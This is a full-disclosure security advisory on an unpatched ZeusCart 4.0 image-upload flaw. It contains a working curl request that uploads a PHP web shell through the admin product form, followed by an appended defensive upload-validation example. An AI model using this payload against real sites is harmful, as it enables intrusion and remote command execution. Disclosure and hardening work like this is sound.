ZeusCart 4.0 Code Execution
Posted on 17 September 2015
ZeusCart 4.0: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed.

3. Proof of Concept

curl -i -s -k -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1849257448' -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name="selcatgory[]"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="selcatgory[]"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="product_title"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="desc"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="sku"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="txtweight"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="status"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="ufile[0]"; filename="test.php"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="price"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="msrp_org"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name="soh"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \
'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

The image will be located here:
http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

6. Blog Reference

http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html
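The root cause in section 2 is that the product-image handler stores whatever the client sends under the client-chosen filename. The handler below is an added example written for this advisory, not ZeusCart's code or the vendor's fix; it assumes the `ufile` multipart field name from the PoC and a hypothetical destination directory, and shows the checks that stop a `.php` upload from ever reaching `images/products`.

```php
<?php
// Added example, not ZeusCart code. Validates one uploaded product image:
// the real content must be an image, and the stored name is generated by
// the server so the client's "test.php" never influences the extension.
function validate_product_image(string $tmpPath, string $destDir): ?string
{
    // Accepted types, keyed by sniffed MIME type, mapped to a fixed extension.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    // 1. Sniff the actual bytes. The client-supplied Content-Type header
    //    (application/x-php in the PoC) is attacker-controlled and ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime === false || !isset($allowed[$mime])) {
        return null;
    }

    // 2. Require that the file decodes as an image; a PHP script does not.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }

    // 3. Server-generated name with a fixed extension: no user input, no
    //    double extensions like "test.php.jpg", no path traversal.
    $newName = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest    = rtrim($destDir, '/') . '/' . $newName;

    // move_uploaded_file() refuses anything that is not a genuine PHP upload.
    if (!move_uploaded_file($tmpPath, $dest)) {
        return null;
    }
    return $newName;
}

// Hypothetical call site in the product-entry handler; $_FILES['ufile'] is
// an array field, matching the ufile[0] part of the multipart request.
if (isset($_FILES['ufile']['tmp_name'][0])) {
    $stored = validate_product_image(
        $_FILES['ufile']['tmp_name'][0],
        __DIR__ . '/../images/products'   // assumed upload directory
    );
    if ($stored === null) {
        http_response_code(400);
        exit('Rejected: not a valid product image');
    }
}
```

Even a genuine image can carry embedded PHP in metadata, so the web server should additionally be configured to never execute scripts from the `images/products` directory; content validation alone is not sufficient.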